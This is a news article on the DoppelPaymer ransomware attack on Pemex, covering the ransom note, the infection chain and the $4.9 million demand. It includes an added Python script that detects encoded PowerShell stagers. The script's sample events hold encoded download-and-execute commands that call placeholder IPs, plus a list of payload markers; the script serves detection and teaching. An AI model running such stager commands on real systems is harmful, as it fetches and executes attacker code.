Mexico's state-owned oil company, Pemex, has suffered a DoppelPaymer ransomware attack that demanded $4.9 million USD in order to decrypt their files.

On Sunday, November 10th, Pemex was hit with a ransomware attack that the company states affected less than 5% of its computers. Workers reported, though, that internal memos initially told them not to turn on their computers; systems were up and running again later in the day on Monday.

In a later statement posted to Twitter, Pemex stated that it is operating normally and that there was no effect on its fuel production, supply, and inventory.

Pemex operates normally

* Operation and production systems operate normally

* Inventory and fuel supply are guaranteed

* The oil community and society should disregard rumors that damage the image of the company.

In the face of the wave of apocryphal rumors and communiqués, notes and comments on social media about an attack on internal computer systems belonging to Petroleos Mexicanos, the company reports the following: Petroleos Mexicanos operates normally. Operation and production systems of the company have not been compromised, and are protected.

The internal network of Pemex, like those of all major companies and government, financial, national and international institutions, is often the target of cyber threats and attacks that as of today have not been successful. Yesterday, Sunday, November 10, the state's production company was the target of attempted attacks that were neutralized in a timely manner, affecting the functioning of less than 5% of the personal computer equipment. However, Pemex reiterates that fuel production, supply, and inventories are safe.

Pemex improves the security of its computer systems and encourages/recommends members of the oil community and society to disregard rumors that hurt the image of the company.

Hit by DoppelPaymer Ransomware

While reports initially stated that Pemex was affected by the Ryuk Ransomware, leaked ransom notes and the Tor payment site confirm that it was the DoppelPaymer infection, which is an offshoot of the BitPaymer ransomware.

In a screenshot of the leaked ransom notes shared with BleepingComputer by security researcher Pollo, we were able to clearly identify the ransomware as DoppelPaymer. While the ransom note shares many similarities to the BitPaymer ransom note, you can see that it includes the DATA portion, which is unique to DoppelPaymer.

Pemex DoppelPaymer Ransom Note

Though the ransom note does not indicate the name of the company, a source familiar with the matter shared the full Tor payment site URL with BleepingComputer, which identifies Pemex as the victim.

Tor Payment Site for Pemex

Security researchers MalwareHunterTeam and Vitali Kremez were also able to find the malware sample used in the Pemex attack, which further confirms the DoppelPaymer infection.

Kremez told BleepingComputer in conversations that Pemex was probably targeted by an initial infection of the Emotet Trojan, which then dropped the Dridex malware.

This would have eventually provided network access to the DoppelPaymer actors, who would then have used Cobalt Strike and PowerShell Empire to spread the ransomware laterally through the rest of the network.
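The Emotet to Dridex to Cobalt Strike/PowerShell Empire chain described above leaves a recognizable footprint on endpoints: both frameworks typically launch stagers through encoded, hidden-window PowerShell spawned from an unusual parent process. The script below is an added example written for this article, not code from BleepingComputer, Kremez, or Pemex, and the log lines it scans are constructed samples rather than real Pemex telemetry; the launcher flags, marker strings, and parent-process list are heuristics assumed for illustration. It decodes the `-EncodedCommand` payload (base64 of UTF-16LE, as PowerShell expects), checks the decoded script for download-and-execute markers, and scores each event.

```python
"""Heuristic detection of encoded-PowerShell launchers of the kind used by
PowerShell Empire and Cobalt Strike stagers during lateral movement.

Added example; sample events are constructed, not real telemetry.
"""
import base64
import re


def _enc(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample payloads: two download-and-execute stagers and one benign admin command.
_EMPIRE_STYLE = _enc("$wc=New-Object System.Net.WebClient;IEX $wc.DownloadString('http://192.0.2.10/launcher')")
_CS_STYLE = _enc("IEX (New-Object Net.Webclient).DownloadString('http://192.0.2.20:8080/a')")
_BENIGN = _enc("Get-Service | Where-Object Status -eq 'Running'")

# Constructed process-creation events: "host|parent_image|command_line".
SAMPLE_EVENTS = [
    "WS-042|C:\\Windows\\System32\\wscript.exe|powershell.exe -noP -sta -w 1 -enc " + _EMPIRE_STYLE,
    "SRV-FILE01|C:\\Windows\\System32\\wbem\\WmiPrvSE.exe|powershell -nop -w hidden -encodedcommand " + _CS_STYLE,
    "WS-007|C:\\Windows\\explorer.exe|powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + _BENIGN,
    "WS-007|C:\\Windows\\explorer.exe|cmd.exe /c dir C:\\Users",
]

# Launcher flags (assumed patterns): encoded command, hidden window, no profile.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_FLAG = re.compile(r"(?i)\s-w(?:indowstyle)?\s+(?:1|h|hidden)\b")
NOPROFILE_FLAG = re.compile(r"(?i)\s-no(?:p|profile)\b")
# Parents that rarely spawn PowerShell legitimately (assumed list for illustration).
SUSPICIOUS_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe", "wmiprvse.exe"}
# Strings typical of a stager that fetches and runs remote code.
PAYLOAD_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String", "Net.WebClient")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(line: str) -> dict:
    """Collect indicators for one event and assign a severity."""
    host, parent, cmdline = line.split("|", 2)
    parent_name = parent.rsplit("\\", 1)[-1].lower()
    indicators = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        indicators.append("encoded_command")
        indicators += [f"payload:{m}" for m in PAYLOAD_MARKERS if m.lower() in decoded.lower()]
    if HIDDEN_FLAG.search(cmdline):
        indicators.append("hidden_window")
    if NOPROFILE_FLAG.search(cmdline):
        indicators.append("no_profile")
    if parent_name in SUSPICIOUS_PARENTS:
        indicators.append(f"parent:{parent_name}")
    # A decoded payload that fetches and runs remote code is the strongest signal;
    # launcher flags and an odd parent raise confidence.
    fetch_and_run = any(i.startswith("payload:") for i in indicators)
    if fetch_and_run and len(indicators) >= 3:
        severity = "high"
    elif fetch_and_run or len(indicators) >= 2:
        severity = "medium"
    elif indicators:
        severity = "low"
    else:
        severity = "none"
    return {"host": host, "parent": parent_name, "severity": severity,
            "indicators": indicators, "decoded": decoded}


def analyze(events) -> list:
    """Score every event and return those with at least one indicator."""
    return [r for r in (score_event(e) for e in events) if r["severity"] != "none"]


if __name__ == "__main__":
    for r in analyze(SAMPLE_EVENTS):
        print(f"[{r['severity']:>6}] {r['host']} parent={r['parent']} {', '.join(r['indicators'])}")
        if r["decoded"]:
            print("         decoded:", r["decoded"])
```

On the constructed events the two stager-style launches score high (encoded download-and-execute payload, hidden window, no profile, script-host or WMI parent) while the benign encoded admin command scores low, which is the distinction a triage rule needs: encoding alone is common in legitimate automation, so the decoded content and the process lineage carry the weight.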

Attackers demanded a $4.9 Million ransom

With access to the Tor payment site for the victim, we can see that the DoppelPaymer group demanded 565 bitcoins, or $4,899,295.80 USD at today's prices.

Pemex Ransom Demand of 565 Bitcoins

The DoppelPaymer payment site offers a chat feature where a victim can get support or negotiate with the ransomware developers.

This online chat is empty, which indicates that Pemex did not attempt to use it to discuss the ransom with the attackers.